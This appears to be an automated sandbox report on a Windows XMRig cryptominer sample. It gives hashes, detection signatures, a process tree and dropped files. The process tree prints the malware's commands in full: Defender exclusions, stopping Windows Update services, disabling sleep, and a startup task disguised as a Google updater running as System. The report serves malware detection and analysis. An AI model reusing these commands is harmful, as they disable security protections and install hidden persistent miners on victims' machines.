Analysis

  • max time kernel
    170s
  • max time network
    178s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-11-2023 17:05

General

  • Target

    file.exe

  • Size

    5.6MB

  • MD5

    40253a5c2afc1bddfe2a9cb958b51a04

  • SHA1

    9fb0a04691588e6c6dd300b76bb21f635baadaad

  • SHA256

    345e2079dbfff1b00d5f13dc881b21383ab1d15e36739ac951df51dc0fa4f835

  • SHA512

    f2a5e867578de904e1fd5e1f52230ea4b812bbc5deff0ef9a036150809aa9d271b679f67d54ee240d98cc974884e5854cc66cd8e1013c24dcf0d701509d38b2b

  • SSDEEP

    98304:xTeyCFQywfwd3PquhdAl5a8Sgyr3XtM9jrU9ruoZ8D92JaXUz8+GCRbBxWQw:xqy+x5P5dK5HSgQX+9jrU1uoCB2JwSRI

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 10 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3196
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4528
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:2308
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1836
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1220
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:4812
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:4348
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4464
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5108
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3880
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3752
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:8
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#icrgqru#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3140
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:3608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:1376
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4792
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:1004
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:4532
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:2308
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:1836
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:5032
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4812
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:2516
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:3388
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:4740
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:3440
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#icrgqru#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4988
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:872
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3548
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:2884

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  5.6MB

                  MD5

                  40253a5c2afc1bddfe2a9cb958b51a04

                  SHA1

                  9fb0a04691588e6c6dd300b76bb21f635baadaad

                  SHA256

                  345e2079dbfff1b00d5f13dc881b21383ab1d15e36739ac951df51dc0fa4f835

                  SHA512

                  f2a5e867578de904e1fd5e1f52230ea4b812bbc5deff0ef9a036150809aa9d271b679f67d54ee240d98cc974884e5854cc66cd8e1013c24dcf0d701509d38b2b

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  5.6MB

                  MD5

                  40253a5c2afc1bddfe2a9cb958b51a04

                  SHA1

                  9fb0a04691588e6c6dd300b76bb21f635baadaad

                  SHA256

                  345e2079dbfff1b00d5f13dc881b21383ab1d15e36739ac951df51dc0fa4f835

                  SHA512

                  f2a5e867578de904e1fd5e1f52230ea4b812bbc5deff0ef9a036150809aa9d271b679f67d54ee240d98cc974884e5854cc66cd8e1013c24dcf0d701509d38b2b

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  d85ba6ff808d9e5444a4b369f5bc2730

                  SHA1

                  31aa9d96590fff6981b315e0b391b575e4c0804a

                  SHA256

                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                  SHA512

                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  62623d22bd9e037191765d5083ce16a3

                  SHA1

                  4a07da6872672f715a4780513d95ed8ddeefd259

                  SHA256

                  95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                  SHA512

                  9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdfvbrp0.xb2.psm1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  4KB

                  MD5

                  bdb25c22d14ec917e30faf353826c5de

                  SHA1

                  6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                  SHA256

                  e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                  SHA512

                  b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  b42c70c1dbf0d1d477ec86902db9e986

                  SHA1

                  1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                  SHA256

                  8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                  SHA512

                  57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                • memory/872-119-0x00007FF669400000-0x00007FF66942A000-memory.dmp

                  Filesize

                  168KB

                • memory/872-115-0x00007FF669400000-0x00007FF66942A000-memory.dmp

                  Filesize

                  168KB

                • memory/1376-69-0x000001FA50D50000-0x000001FA50D5A000-memory.dmp

                  Filesize

                  40KB

                • memory/1376-66-0x000001FA50C00000-0x000001FA50C0A000-memory.dmp

                  Filesize

                  40KB

                • memory/1376-74-0x000001FA37900000-0x000001FA37910000-memory.dmp

                  Filesize

                  64KB

                • memory/1376-65-0x000001FA50B40000-0x000001FA50BF5000-memory.dmp

                  Filesize

                  724KB

                • memory/1376-73-0x000001FA50DA0000-0x000001FA50DAA000-memory.dmp

                  Filesize

                  40KB

                • memory/1376-72-0x000001FA50D90000-0x000001FA50D96000-memory.dmp

                  Filesize

                  24KB

                • memory/1376-71-0x000001FA50D60000-0x000001FA50D68000-memory.dmp

                  Filesize

                  32KB

                • memory/1376-64-0x000001FA50B20000-0x000001FA50B3C000-memory.dmp

                  Filesize

                  112KB

                • memory/1376-70-0x000001FA50DB0000-0x000001FA50DCA000-memory.dmp

                  Filesize

                  104KB

                • memory/1376-77-0x00007FFAA30C0000-0x00007FFAA3B81000-memory.dmp

                  Filesize

                  10.8MB

                • memory/1376-54-0x00007FF492270000-0x00007FF492280000-memory.dmp

                  Filesize

                  64KB

                • memory/1376-53-0x000001FA37900000-0x000001FA37910000-memory.dmp

                  Filesize

                  64KB

                • memory/1376-67-0x000001FA50D70000-0x000001FA50D8C000-memory.dmp

                  Filesize

                  112KB

                • memory/1376-52-0x00007FFAA30C0000-0x00007FFAA3B81000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2420-0-0x00007FF77FB40000-0x00007FF7800DC000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2420-40-0x00007FF77FB40000-0x00007FF7800DC000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2420-35-0x00007FF77FB40000-0x00007FF7800DC000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2420-16-0x00007FF77FB40000-0x00007FF7800DC000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2884-112-0x00007FF7F5EF0000-0x00007FF7F648C000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2884-42-0x00007FF7F5EF0000-0x00007FF7F648C000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2884-68-0x00007FF7F5EF0000-0x00007FF7F648C000-memory.dmp

                  Filesize

                  5.6MB

                • memory/3140-38-0x00007FFAA3440000-0x00007FFAA3F01000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3140-36-0x000001C06AAA0000-0x000001C06AAB0000-memory.dmp

                  Filesize

                  64KB

                • memory/3140-34-0x00007FFAA3440000-0x00007FFAA3F01000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3140-33-0x000001C06AAA0000-0x000001C06AAB0000-memory.dmp

                  Filesize

                  64KB

                • memory/3140-32-0x000001C06AAA0000-0x000001C06AAB0000-memory.dmp

                  Filesize

                  64KB

                • memory/3140-21-0x000001C06AAA0000-0x000001C06AAB0000-memory.dmp

                  Filesize

                  64KB

                • memory/3140-20-0x000001C06AAA0000-0x000001C06AAB0000-memory.dmp

                  Filesize

                  64KB

                • memory/3140-19-0x00007FFAA3440000-0x00007FFAA3F01000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3548-134-0x00007FF6B32C0000-0x00007FF6B3AAF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3548-132-0x00007FF6B32C0000-0x00007FF6B3AAF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3548-130-0x00007FF6B32C0000-0x00007FF6B3AAF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3548-128-0x00007FF6B32C0000-0x00007FF6B3AAF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3548-126-0x00007FF6B32C0000-0x00007FF6B3AAF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3548-124-0x0000000000D50000-0x0000000000D70000-memory.dmp

                  Filesize

                  128KB

                • memory/3548-123-0x00007FF6B32C0000-0x00007FF6B3AAF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3548-121-0x0000000000D50000-0x0000000000D70000-memory.dmp

                  Filesize

                  128KB

                • memory/3548-120-0x00007FF6B32C0000-0x00007FF6B3AAF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3548-114-0x0000000001380000-0x00000000013C0000-memory.dmp

                  Filesize

                  256KB

                • memory/3548-118-0x00007FF6B32C0000-0x00007FF6B3AAF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3548-116-0x00007FF6B32C0000-0x00007FF6B3AAF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3548-113-0x0000000000CE0000-0x0000000000D00000-memory.dmp

                  Filesize

                  128KB

                • memory/4528-10-0x00000253AA970000-0x00000253AA992000-memory.dmp

                  Filesize

                  136KB

                • memory/4528-17-0x00007FFAA3320000-0x00007FFAA3DE1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4528-11-0x00007FFAA3320000-0x00007FFAA3DE1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4528-13-0x00000253AA9A0000-0x00000253AA9B0000-memory.dmp

                  Filesize

                  64KB

                • memory/4528-12-0x00000253AA9A0000-0x00000253AA9B0000-memory.dmp

                  Filesize

                  64KB

                • memory/4988-107-0x00007FFAA3440000-0x00007FFAA3F01000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4988-104-0x000001F8A2680000-0x000001F8A2690000-memory.dmp

                  Filesize

                  64KB

                • memory/4988-102-0x00007FF4F6380000-0x00007FF4F6390000-memory.dmp

                  Filesize

                  64KB

                • memory/4988-103-0x000001F8A3360000-0x000001F8A3415000-memory.dmp

                  Filesize

                  724KB

                • memory/4988-92-0x000001F8A2680000-0x000001F8A2690000-memory.dmp

                  Filesize

                  64KB

                • memory/4988-105-0x000001F8A2680000-0x000001F8A2690000-memory.dmp

                  Filesize

                  64KB

                • memory/4988-81-0x000001F8A2680000-0x000001F8A2690000-memory.dmp

                  Filesize

                  64KB

                • memory/4988-80-0x000001F8A2680000-0x000001F8A2690000-memory.dmp

                  Filesize

                  64KB

                • memory/4988-79-0x00007FFAA3440000-0x00007FFAA3F01000-memory.dmp

                  Filesize

                  10.8MB